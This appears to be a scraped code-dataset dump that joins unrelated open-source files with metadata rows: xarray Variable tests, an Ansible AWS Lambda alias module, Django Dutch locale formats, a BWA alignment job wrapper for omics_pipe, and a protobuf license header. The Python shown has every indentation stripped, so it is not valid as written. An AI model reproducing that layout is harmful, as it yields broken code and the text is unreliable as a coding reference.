v2 = v
v2 += 1
self.assertIs(v, v2)
# since we provided an ndarray for data, it is also modified in-place
self.assertIs(source_ndarray(v.values), x)
self.assertArrayEqual(v.values, np.arange(5) + 1)
with self.assertRaisesRegexp(ValueError, 'dimensions cannot change'):
v += Variable('y', np.arange(5))
def test_reduce(self):
v = Variable(['x', 'y'], self.d, {'ignored': 'attributes'})
self.assertVariableIdentical(v.reduce(np.std, 'x'),
Variable(['y'], self.d.std(axis=0)))
self.assertVariableIdentical(v.reduce(np.std, axis=0),
v.reduce(np.std, dim='x'))
self.assertVariableIdentical(v.reduce(np.std, ['y', 'x']),
Variable([], self.d.std(axis=(0, 1))))
self.assertVariableIdentical(v.reduce(np.std),
Variable([], self.d.std()))
self.assertVariableIdentical(
v.reduce(np.mean, 'x').reduce(np.std, 'y'),
Variable([], self.d.mean(axis=0).std()))
self.assertVariableAllClose(v.mean('x'), v.reduce(np.mean, 'x'))
with self.assertRaisesRegexp(ValueError, 'cannot supply both'):
v.mean(dim='x', axis=0)
@pytest.mark.skipif(LooseVersion(np.__version__) < LooseVersion('1.10.0'),
reason='requires numpy version 1.10.0 or later')
def test_quantile(self):
v = Variable(['x', 'y'], self.d)
for q in [0.25, [0.50], [0.25, 0.75]]:
for axis, dim in zip([None, 0, [0], [0, 1]],
[None, 'x', ['x'], ['x', 'y']]):
actual = v.quantile(q, dim=dim)
expected = np.nanpercentile(self.d, np.array(q) * 100,
axis=axis)
np.testing.assert_allclose(actual.values, expected)
@requires_dask
def test_quantile_dask_raises(self):
# regression for GH1524
v = Variable(['x', 'y'], self.d).chunk(2)
with self.assertRaisesRegexp(TypeError, 'arrays stored as dask'):
v.quantile(0.5, dim='x')
def test_big_endian_reduce(self):
# regression test for GH489
data = np.ones(5, dtype='>f4')
v = Variable(['x'], data)
expected = Variable([], 5)
self.assertVariableIdentical(expected, v.sum())
def test_reduce_funcs(self):
v = Variable('x', np.array([1, np.nan, 2, 3]))
self.assertVariableIdentical(v.mean(), Variable([], 2))
self.assertVariableIdentical(v.mean(skipna=True), Variable([], 2))
self.assertVariableIdentical(v.mean(skipna=False), Variable([], np.nan))
self.assertVariableIdentical(np.mean(v), Variable([], 2))
self.assertVariableIdentical(v.prod(), Variable([], 6))
self.assertVariableIdentical(v.cumsum(axis=0),
Variable('x', np.array([1, 1, 3, 6])))
self.assertVariableIdentical(v.cumprod(axis=0),
Variable('x', np.array([1, 1, 2, 6])))
self.assertVariableIdentical(v.var(), Variable([], 2.0 / 3))
if LooseVersion(np.__version__) < '1.9':
with self.assertRaises(NotImplementedError):
v.median()
else:
self.assertVariableIdentical(v.median(), Variable([], 2))
v = Variable('x', [True, False, False])
self.assertVariableIdentical(v.any(), Variable([], True))
self.assertVariableIdentical(v.all(dim='x'), Variable([], False))
v = Variable('t', pd.date_range('2000-01-01', periods=3))
with self.assertRaises(NotImplementedError):
v.max(skipna=True)
self.assertVariableIdentical(
v.max(), Variable([], pd.Timestamp('2000-01-03')))
def test_reduce_keep_attrs(self):
_attrs = {'units': 'test', 'long_name': 'testing'}
v = Variable(['x', 'y'], self.d, _attrs)
# Test dropped attrs
vm = v.mean()
self.assertEqual(len(vm.attrs), 0)
self.assertEqual(vm.attrs, OrderedDict())
# Test kept attrs
vm = v.mean(keep_attrs=True)
self.assertEqual(len(vm.attrs), len(_attrs))
self.assertEqual(vm.attrs, _attrs)
def test_count(self):
expected = Variable([], 3)
actual = Variable(['x'], [1, 2, 3, np.nan]).count()
self.assertVariableIdentical(expected, actual)
v = Variable(['x'], np.array(['1', '2', '3', np.nan], dtype=object))
actual = v.count()
self.assertVariableIdentical(expected, actual)
actual = Variable(['x'], [True, False, True]).count()
self.assertVariableIdentical(expected, actual)
self.assertEqual(actual.dtype, int)
expected = Variable(['x'], [2, 3])
actual = Variable(['x', 'y'], [[1, 0, np.nan], [1, 1, 1]]).count('y')
self.assertVariableIdentical(expected, actual)
class TestIndexVariable(TestCase, VariableSubclassTestCases):
cls = staticmethod(IndexVariable)
def test_init(self):
with self.assertRaisesRegexp(ValueError, 'must be 1-dimensional'):
IndexVariable((), 0)
def test_to_index(self):
data = 0.5 * np.arange(10)
v = IndexVariable(['time'], data, {'foo': 'bar'})
self.assertTrue(pd.Index(data, name='time').identical(v.to_index()))
def test_multiindex_default_level_names(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2]])
v = IndexVariable(['x'], midx, {'foo': 'bar'})
self.assertEqual(v.to_index().names, ('x_level_0', 'x_level_1'))
def test_data(self):
x = IndexVariable('x', np.arange(3.0))
self.assertIsInstance(x._data, PandasIndexAdapter)
self.assertIsInstance(x.data, np.ndarray)
self.assertEqual(float, x.dtype)
self.assertArrayEqual(np.arange(3), x)
self.assertEqual(float, x.values.dtype)
with self.assertRaisesRegexp(TypeError, 'cannot be modified'):
x[:] = 0
def test_name(self):
coord = IndexVariable('x', [10.0])
self.assertEqual(coord.name, 'x')
with self.assertRaises(AttributeError):
coord.name = 'y'
def test_level_names(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2]],
names=['level_1', 'level_2'])
x = IndexVariable('x', midx)
self.assertEqual(x.level_names, midx.names)
self.assertIsNone(IndexVariable('y', [10.0]).level_names)
def test_get_level_variable(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2]],
names=['level_1', 'level_2'])
x = IndexVariable('x', midx)
level_1 = IndexVariable('x', midx.get_level_values('level_1'))
self.assertVariableIdentical(x.get_level_variable('level_1'), level_1)
with self.assertRaisesRegexp(ValueError, 'has no MultiIndex'):
IndexVariable('y', [10.0]).get_level_variable('level')
def test_concat_periods(self):
periods = pd.period_range('2000-01-01', periods=10)
coords = [IndexVariable('t', periods[:5]), IndexVariable('t', periods[5:])]
expected = IndexVariable('t', periods)
actual = IndexVariable.concat(coords, dim='t')
assert actual.identical(expected)
assert isinstance(actual.to_index(), pd.PeriodIndex)
positions = [list(range(5)), list(range(5, 10))]
actual = IndexVariable.concat(coords, dim='t', positions=positions)
assert actual.identical(expected)
assert isinstance(actual.to_index(), pd.PeriodIndex)
def test_concat_multiindex(self):
idx = pd.MultiIndex.from_product([[0, 1, 2], ['a', 'b']])
coords = [IndexVariable('x', idx[:2]), IndexVariable('x', idx[2:])]
expected = IndexVariable('x', idx)
actual = IndexVariable.concat(coords, dim='x')
assert actual.identical(expected)
assert isinstance(actual.to_index(), pd.MultiIndex)
def test_coordinate_alias(self):
with self.assertWarns('deprecated'):
x = Coordinate('x', [1, 2, 3])
self.assertIsInstance(x, IndexVariable)
class TestAsCompatibleData(TestCase):
def test_unchanged_types(self):
types = (np.asarray, PandasIndexAdapter, indexing.LazilyIndexedArray)
for t in types:
for data in [np.arange(3),
pd.date_range('2000-01-01', periods=3),
pd.date_range('2000-01-01', periods=3).values]:
x = t(data)
self.assertIs(source_ndarray(x),
source_ndarray(as_compatible_data(x)))
def test_converted_types(self):
for input_array in [[[0, 1, 2]], pd.DataFrame([[0, 1, 2]])]:
actual = as_compatible_data(input_array)
self.assertArrayEqual(np.asarray(input_array), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.asarray(input_array).dtype, actual.dtype)
def test_masked_array(self):
original = np.ma.MaskedArray(np.arange(5))
expected = np.arange(5)
actual = as_compatible_data(original)
self.assertArrayEqual(expected, actual)
self.assertEqual(np.dtype(int), actual.dtype)
original = np.ma.MaskedArray(np.arange(5), mask=4 * [False] + [True])
expected = np.arange(5.0)
expected[-1] = np.nan
actual = as_compatible_data(original)
self.assertArrayEqual(expected, actual)
self.assertEqual(np.dtype(float), actual.dtype)
def test_datetime(self):
expected = np.datetime64('2000-01-01T00Z')
actual = as_compatible_data(expected)
self.assertEqual(expected, actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
expected = np.array([np.datetime64('2000-01-01T00Z')])
actual = as_compatible_data(expected)
self.assertEqual(np.asarray(expected), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
expected = np.array([np.datetime64('2000-01-01T00Z', 'ns')])
actual = as_compatible_data(expected)
self.assertEqual(np.asarray(expected), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
self.assertIs(expected, source_ndarray(np.asarray(actual)))
expected = np.datetime64('2000-01-01T00Z', 'ns')
actual = as_compatible_data(datetime(2000, 1, 1))
self.assertEqual(np.asarray(expected), actual)
self.assertEqual(np.ndarray, type(actual))
self.assertEqual(np.dtype('datetime64[ns]'), actual.dtype)
def test_full_like(self):
# For more thorough tests, see test_variable.py
orig = Variable(dims=('x', 'y'), data=[[1.5 ,2.0], [3.1, 4.3]],
attrs={'foo': 'bar'})
expect = orig.copy(deep=True)
expect.values = [[2.0, 2.0], [2.0, 2.0]]
self.assertVariableIdentical(expect, full_like(orig, 2))
# override dtype
expect.values = [[True, True], [True, True]]
self.assertEquals(expect.dtype, bool)
self.assertVariableIdentical(expect, full_like(orig, True, dtype=bool))
@requires_dask
def test_full_like_dask(self):
orig = Variable(dims=('x', 'y'), data=[[1.5, 2.0], [3.1, 4.3]],
attrs={'foo': 'bar'}).chunk(((1, 1), (2,)))
def check(actual, expect_dtype, expect_values):
self.assertEqual(actual.dtype, expect_dtype)
self.assertEqual(actual.shape, orig.shape)
self.assertEqual(actual.dims, orig.dims)
self.assertEqual(actual.attrs, orig.attrs)
self.assertEqual(actual.chunks, orig.chunks)
self.assertArrayEqual(actual.values, expect_values)
check(full_like(orig, 2),
orig.dtype, np.full_like(orig.values, 2))
# override dtype
check(full_like(orig, True, dtype=bool),
bool, np.full_like(orig.values, True, dtype=bool))
# Check that there's no array stored inside dask
# (e.g. we didn't create a numpy array and then we chunked it!)
dsk = full_like(orig, 1).data.dask
for v in dsk.values():
if isinstance(v, tuple):
for vi in v:
assert not isinstance(vi, np.ndarray)
else:
assert not isinstance(v, np.ndarray)
def test_zeros_like(self):
orig = Variable(dims=('x', 'y'), data=[[1.5 ,2.0], [3.1, 4.3]],
attrs={'foo': 'bar'})
self.assertVariableIdentical(zeros_like(orig),
full_like(orig, 0))
self.assertVariableIdentical(zeros_like(orig, dtype=int),
full_like(orig, 0, dtype=int))
def test_ones_like(self):
orig = Variable(dims=('x', 'y'), data=[[1.5 ,2.0], [3.1, 4.3]],
attrs={'foo': 'bar'})
self.assertVariableIdentical(ones_like(orig),
full_like(orig, 1))
self.assertVariableIdentical(ones_like(orig, dtype=int),
full_like(orig, 1, dtype=int))
| apache-2.0 | 5,645,038,719,097,120,000 | 40.735907 | 95 | 0.560465 | false |
maxamillion/ansible-modules-extras | cloud/amazon/lambda_alias.py | 25 | 12180 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
try:
import boto3
from botocore.exceptions import ClientError, ParamValidationError, MissingParametersError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
DOCUMENTATION = '''
---
module: lambda_alias
short_description: Creates, updates or deletes AWS Lambda function aliases.
description:
- This module allows the management of AWS Lambda functions aliases via the Ansible
framework. It is idempotent and supports "Check" mode. Use module M(lambda) to manage the lambda function
itself and M(lambda_event) to manage event source mappings.
version_added: "2.2"
author: Pierre Jodouin (@pjodouin), Ryan Scott Brown (@ryansb)
options:
function_name:
description:
- The name of the function alias.
required: true
state:
description:
- Describes the desired state.
required: true
default: "present"
choices: ["present", "absent"]
name:
description:
- Name of the function alias.
required: true
aliases: ['alias_name']
description:
description:
- A short, user-defined function alias description.
required: false
version:
description:
- Version associated with the Lambda function alias.
A value of 0 (or omitted parameter) sets the alias to the $LATEST version.
required: false
aliases: ['function_version']
requirements:
- boto3
extends_documentation_fragment:
- aws
'''
EXAMPLES = '''
---
# Simple example to create a lambda function and publish a version
- hosts: localhost
gather_facts: no
vars:
state: present
project_folder: /path/to/deployment/package
deployment_package: lambda.zip
account: 123456789012
production_version: 5
tasks:
- name: AWS Lambda Function
lambda:
state: "{{ state | default('present') }}"
name: myLambdaFunction
publish: True
description: lambda function description
code_s3_bucket: package-bucket
code_s3_key: "lambda/{{ deployment_package }}"
local_path: "{{ project_folder }}/{{ deployment_package }}"
runtime: python2.7
timeout: 5
handler: lambda.handler
memory_size: 128
role: "arn:aws:iam::{{ account }}:role/API2LambdaExecRole"
- name: show results
debug: var=lambda_facts
# The following will set the Dev alias to the latest version ($LATEST) since version is omitted (or = 0)
- name: "alias 'Dev' for function {{ lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_facts.FunctionName }}"
name: Dev
description: Development is $LATEST version
# The QA alias will only be created when a new version is published (i.e. not = '$LATEST')
- name: "alias 'QA' for function {{ lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_facts.FunctionName }}"
name: QA
version: "{{ lambda_facts.Version }}"
description: "QA is version {{ lambda_facts.Version }}"
when: lambda_facts.Version != "$LATEST"
# The Prod alias will have a fixed version based on a variable
- name: "alias 'Prod' for function {{ lambda_facts.FunctionName }} "
lambda_alias:
state: "{{ state | default('present') }}"
function_name: "{{ lambda_facts.FunctionName }}"
name: Prod
version: "{{ production_version }}"
description: "Production is version {{ production_version }}"
'''
RETURN = '''
---
alias_arn:
description: Full ARN of the function, including the alias
returned: success
type: string
sample: arn:aws:lambda:us-west-2:123456789012:function:myFunction:dev
description:
description: A short description of the alias
returned: success
type: string
sample: The development stage for my hot new app
function_version:
description: The qualifier that the alias refers to
returned: success
type: string
sample: $LATEST
name:
description: The name of the alias assigned
returned: success
type: string
sample: dev
'''
class AWSConnection:
"""
Create the connection object and client objects as required.
"""
def __init__(self, ansible_obj, resources, boto3=True):
try:
self.region, self.endpoint, aws_connect_kwargs = get_aws_connection_info(ansible_obj, boto3=boto3)
self.resource_client = dict()
if not resources:
resources = ['lambda']
resources.append('iam')
for resource in resources:
aws_connect_kwargs.update(dict(region=self.region,
endpoint=self.endpoint,
conn_type='client',
resource=resource
))
self.resource_client[resource] = boto3_conn(ansible_obj, **aws_connect_kwargs)
# if region is not provided, then get default profile/session region
if not self.region:
self.region = self.resource_client['lambda'].meta.region_name
except (ClientError, ParamValidationError, MissingParametersError) as e:
ansible_obj.fail_json(msg="Unable to connect, authorize or access resource: {0}".format(e))
try:
self.account_id = self.resource_client['iam'].get_user()['User']['Arn'].split(':')[4]
except (ClientError, ValueError, KeyError, IndexError):
self.account_id = ''
def client(self, resource='lambda'):
return self.resource_client[resource]
def pc(key):
"""
Changes python key into Pascale case equivalent. For example, 'this_function_name' becomes 'ThisFunctionName'.
:param key:
:return:
"""
return "".join([token.capitalize() for token in key.split('_')])
def set_api_params(module, module_params):
"""
Sets module parameters to those expected by the boto3 API.
:param module:
:param module_params:
:return:
"""
api_params = dict()
for param in module_params:
module_param = module.params.get(param, None)
if module_param:
api_params[pc(param)] = module_param
return api_params
def validate_params(module, aws):
"""
Performs basic parameter validation.
:param module: Ansible module reference
:param aws: AWS client connection
:return:
"""
function_name = module.params['function_name']
# validate function name
if not re.search('^[\w\-:]+$', function_name):
module.fail_json(
msg='Function name {0} is invalid. Names must contain only alphanumeric characters and hyphens.'.format(function_name)
)
if len(function_name) > 64:
module.fail_json(msg='Function name "{0}" exceeds 64 character limit'.format(function_name))
# if parameter 'function_version' is zero, set it to $LATEST, else convert it to a string
if module.params['function_version'] == 0:
module.params['function_version'] = '$LATEST'
else:
module.params['function_version'] = str(module.params['function_version'])
return
def get_lambda_alias(module, aws):
"""
Returns the lambda function alias if it exists.
:param module: Ansible module reference
:param aws: AWS client connection
:return:
"""
client = aws.client('lambda')
# set API parameters
api_params = set_api_params(module, ('function_name', 'name'))
# check if alias exists and get facts
try:
results = client.get_alias(**api_params)
except (ClientError, ParamValidationError, MissingParametersError) as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
results = None
else:
module.fail_json(msg='Error retrieving function alias: {0}'.format(e))
return results
def lambda_alias(module, aws):
"""
Adds, updates or deletes lambda function aliases.
:param module: Ansible module reference
:param aws: AWS client connection
:return dict:
"""
client = aws.client('lambda')
results = dict()
changed = False
current_state = 'absent'
state = module.params['state']
facts = get_lambda_alias(module, aws)
if facts:
current_state = 'present'
if state == 'present':
if current_state == 'present':
# check if alias has changed -- only version and description can change
alias_params = ('function_version', 'description')
for param in alias_params:
if module.params.get(param) != facts.get(pc(param)):
changed = True
break
if changed:
api_params = set_api_params(module, ('function_name', 'name'))
api_params.update(set_api_params(module, alias_params))
if not module.check_mode:
try:
results = client.update_alias(**api_params)
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error updating function alias: {0}'.format(e))
else:
# create new function alias
api_params = set_api_params(module, ('function_name', 'name', 'function_version', 'description'))
try:
if not module.check_mode:
results = client.create_alias(**api_params)
changed = True
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error creating function alias: {0}'.format(e))
else: # state = 'absent'
if current_state == 'present':
# delete the function
api_params = set_api_params(module, ('function_name', 'name'))
try:
if not module.check_mode:
results = client.delete_alias(**api_params)
changed = True
except (ClientError, ParamValidationError, MissingParametersError) as e:
module.fail_json(msg='Error deleting function alias: {0}'.format(e))
return dict(changed=changed, **dict(results or facts))
def main():
"""
Main entry point.
:return dict: ansible facts
"""
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
state=dict(required=False, default='present', choices=['present', 'absent']),
function_name=dict(required=True, default=None),
name=dict(required=True, default=None, aliases=['alias_name']),
function_version=dict(type='int', required=False, default=0, aliases=['version']),
description=dict(required=False, default=None),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[],
required_together=[]
)
# validate dependencies
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required for this module.')
aws = AWSConnection(module, ['lambda'])
validate_params(module, aws)
results = lambda_alias(module, aws)
module.exit_json(**camel_dict_to_snake_dict(results))
# ansible import module(s) kept at ~eof as recommended
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 | -4,883,299,569,400,926,000 | 30.71875 | 130 | 0.627586 | false |
westinedu/similarinterest | django/conf/locale/nl/formats.py | 329 | 3056 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
)
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '15:23:35'
'%H.%M:%S', # '15.23:35'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
)
DATETIME_INPUT_FORMATS = (
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S', # '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 2009 15:23:35'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 2009 15.23:35'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 2009 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 2009 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 2009'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause | 3,469,909,092,486,675,000 | 56.660377 | 135 | 0.453207 | false |
adammaikai/OmicsPipe2.0 | omics_pipe/modules/bwa.py | 2 | 6757 | #!/usr/bin/env python
from omics_pipe.parameters.default_parameters import default_parameters
from omics_pipe.utils import *
p = Bunch(default_parameters)
def bwa1(sample, bwa1_flag):
'''BWA aligner for read1 of paired_end reads.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
BWA_INDEX:
RAW_DATA_DIR:
GATK_READ_GROUP_INFO:
COMPRESSION:
'''
SAMPLE1 = sample + "_1"
spawn_job(jobname = 'bwa1', SAMPLE = SAMPLE1, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_RNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, SAMPLE1, p.RAW_DATA_DIR, p.GATK_READ_GROUP_INFO, p.COMPRESSION])
job_status(jobname = 'bwa1', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = SAMPLE1 + "/" + SAMPLE1 + ".sam", FLAG_PATH = p.FLAG_PATH)
return
def bwa2(sample, bwa2_flag):
'''BWA aligner for read2 of paired_end reads.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
BWA_INDEX:
RAW_DATA_DIR:
GATK_READ_GROUP_INFO:
COMPRESSION:
'''
SAMPLE2 = sample + "_2"
spawn_job(jobname = 'bwa2', SAMPLE = SAMPLE2, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_RNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, SAMPLE2, p.RAW_DATA_DIR, p.GATK_READ_GROUP_INFO, p.COMPRESSION])
job_status(jobname = 'bwa2', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = SAMPLE2 + "/" + SAMPLE2 + ".sam", FLAG_PATH = p.FLAG_PATH)
return
def bwa_RNA(sample, bwa_flag):
'''BWA aligner for single end reads.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
BWA_INDEX:
RAW_DATA_DIR:
GATK_READ_GROUP_INFO:
COMPRESSION:
'''
spawn_job(jobname = 'bwa', SAMPLE = sample, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_RNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, sample, p.RAW_DATA_DIR, p.GATK_READ_GROUP_INFO, p.COMPRESSION])
job_status(jobname = 'bwa', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = sample + "/" + sample + ".sam", FLAG_PATH = p.FLAG_PATH)
return
def bwa_mem(sample,bwa_mem_flag):
'''BWA aligner with BWA-MEM algorithm.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
GENOME:
RAW_DATA_DIR:
BWA_OPTIONS:
COMPRESSION:
'''
spawn_job(jobname = 'bwa_mem', SAMPLE = sample, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_" + p.ENDS + "_DNA.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, sample, p.RAW_DATA_DIR, p.BWA_OPTIONS, p.COMPRESSION])
job_status(jobname = 'bwa_mem', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = sample + "/" + sample + "_sorted.bam", FLAG_PATH = p.FLAG_PATH)
return
def bwa_mem_pipe(sample,bwa_mem_pipe_flag):
'''BWA aligner with BWA-MEM algorithm.
input:
.fastq
output:
.sam
citation:
Li H. and Durbin R. (2009) Fast and accurate short read alignment with Burrows-Wheeler transform. Bioinformatics, 25, 1754-1760. [PMID: 19451168]
link:
http://bio-bwa.sourceforge.net/bwa.shtml
parameters from parameters file:
BWA_RESULTS:
TEMP_DIR:
SAMTOOLS_VERSION:
BWA_VERSION:
GENOME:
RAW_DATA_DIR:
BWA_OPTIONS:
COMPRESSION:
SAMBAMBA_VERSION:
SAMBLASTER_VERSION:
SAMBAMBA_OPTIONS:
'''
spawn_job(jobname = 'bwa_mem_pipe', SAMPLE = sample, LOG_PATH = p.LOG_PATH, RESULTS_EMAIL = p.RESULTS_EMAIL, SCHEDULER = p.SCHEDULER, walltime = "240:00:00", queue = p.QUEUE, nodes = 1, ppn = 30, memory = "30gb", script = "/bwa_drmaa_" + p.ENDS + "_DNA_piped.sh", args_list = [p.BWA_RESULTS, p.TEMP_DIR, p.SAMTOOLS_VERSION, p.BWA_VERSION, p.BWA_INDEX, sample, p.RAW_DATA_DIR, p.BWA_OPTIONS, p.COMPRESSION, p.SAMBAMBA_VERSION, p.SAMBLASTER_VERSION, p.SAMBAMBA_OPTIONS])
job_status(jobname = 'bwa_mem_pipe', resultspath = p.BWA_RESULTS, SAMPLE = sample, outputfilename = sample + "/" + sample + "_sorted.bam", FLAG_PATH = p.FLAG_PATH)
return
#(resultspath + "/" + outputfilename)
if __name__ == '__main__':
bwa1(sample, bwa1_flag)
bwa2(sample, bwa2_flag)
bwa_RNA(sample, bwa_flag)
bwa_mem(sample,bwa_mem_flag)
bwa_mem_pipe(sample, bwa_mem_pipe_flag)
sys.exit(0)
| mit | -625,956,713,378,143,400 | 35.327957 | 472 | 0.593755 | false |
Rafiot/botchallenge | client/google/protobuf/internal/cpp_message.py | 2 | 23568 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
